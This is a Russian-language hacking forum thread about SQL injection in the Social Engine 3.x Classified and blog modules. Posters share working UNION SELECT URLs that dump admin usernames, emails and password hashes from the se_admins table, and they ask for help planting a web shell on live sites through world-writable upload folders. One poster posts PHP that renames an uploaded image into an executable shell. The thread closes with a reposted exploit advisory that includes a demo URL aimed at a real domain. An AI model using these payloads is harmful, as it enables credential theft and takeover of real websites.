Social Engine SQL инекция !

В движке Social Engine версия 3.хх на плагине Сlassified есть SQL инекция !

Вот sql инекция :

PHP:

http://sitename.ru/browse_classifieds.php?s=classified_date DESC&v=0&classifiedcat_id=-1+UNION SELECT concat(admin_username,admin_email,0x3a,admin_password)
,2,3+from+se_admins

Как залить шелл ? Помогите друзья !

Вот это скрин таблицы se_admins



CHMOD 777 стоит в папках http://sitename.ru/uploads_user


и на http://sitename.ru/include/smarty/templates_c

Помогите друзья залить ШЕЛЛ кто сможет залить шелл стучите плиз на аску 405-801-351 в долгу не останусь

 

и чё с этой скуль иньекцией мона сделать? ты не разяснил, многим не понятно.

 

получить хэши, расшифровать их и зайти в админку.

а по заливке шелла так никто и не подскажет?

 

версия мускула какая

 

5.0.51a

 

https://forum.antichat.ru/threadnav43966-1-10.html
вот здесь почитай про заливку шела

 

phpmyadmin есть у автора темы.
у меня по его sql-inj есть только доступы к админкам.
где он взял данные по доступу к базе и phpmyadmin я не знаю.

например админка такого сайта:

<вырезано>

как можно туда залить шелл?

 

читай тему что я показал. а админку и пароль лучше убери, засерут

 

Спасибо что ответили

У меня просто есть этот двиг вот и показал вам пример таблицы на phpmyadmin сегодня буду пробовать все что посоветовали ! Ели что стукните мне в аску есть хорошый сайт на этот двиг надо залить шелл )

 

Друзья прочитал все темы но так и не смог залит шелл ( Помогите

 

Присоединяюсь, тоже не смог залить.
По ссылке от NFM всё прочитал, пробовал - не получилось.

В дирректорию /uploads_user/ заливал картинки - 1.jpg с шеллом,
2.jpg:

PHP:

<?php
   system("mv /var/www/admin/data/www/domen.com/uploads_user/1000/2/1.jpg /var/www/admin/data/www/domen.com/uploads_user/1000/2/1.php");
   die();
?>


но include через SQL не получается.

xcedz, через шаблоны тоже не работает - там даже в шапке редактора написано, что PHP отделён от шаблонов.

 

Krobol Какие успехи ?

 

PHP:

browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+UNION+SELECT+concat(admin_username,admin_email,0x3a,admin_password),2,3+from+se_admins

поставил такой запрос но не работает как вывести хеш и логин админа


стукните в аську додумаем вместе как залить шел 858759

 

eworld.uz, у меня пока ничего не получилось

heks, не на всех сайтах работает

 

Думаю работает только для версии 3.10

 

не только все зависит от самого плагина

 

сайт с такой уязвимостью я нашел sql видно хеш и пароль получить не могу

 

может пробел стоит в слове password?
в начале сам чет не заметил

 

нет пробела в адресе не было эту фишку античата я знаю

 

блоги

Code:

                                                                     
                                                                     
                                                                     
                                           
==================================================================================================================
=         SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM            = 
=         S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M            =      
+         SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M            +       
=             S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M            =      
=         SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M            = 
===================================================SNAKES TEAM====================================================
+                                                                                                                =
=              	             Social Engine (blog.php) SQL Injection Vulnerability                                +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =          Discovered By: Snakespc  :::ALGERIAN HaCkEr:::               =     =   
                =                                                                                    =
                                    :::::Mail: [email protected]:::::::             
                =                                                                                    =                                                                                   
                =            http://www.socialengine.net/demos.php  "blog.php"                       =
                  ===================================GAZA=============================================

Exploit:
http://localhost/blog.php?user=darkthronex&category_id=-5+UNION SELECT 1,2,3,4,5,concat(admin_username,0x3a,admin_password),7,8,9,10,11,12,13,14,15,16,17,18+from+se_admins/*
********
demo:
http://www.socialenginedev.com/blog.php?user=darkthronex&category_id=-5+UNION SELECT 1,2,3,4,5,concat(admin_username,0x3a,admin_password),7,8,9,10,11,12,13,14,15,16,17,18+from+se_admins/*
============================================================== ALLAH AKBAR=========================================================

Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: SuB-ZeRo
ALL www.SnakespC.com/sc >>>>dz-security.net >>>> Members 
Str0ke ....Milw0rm
=====================================================GAZA=========================================================================

# milw0rm.com [2009-01-28]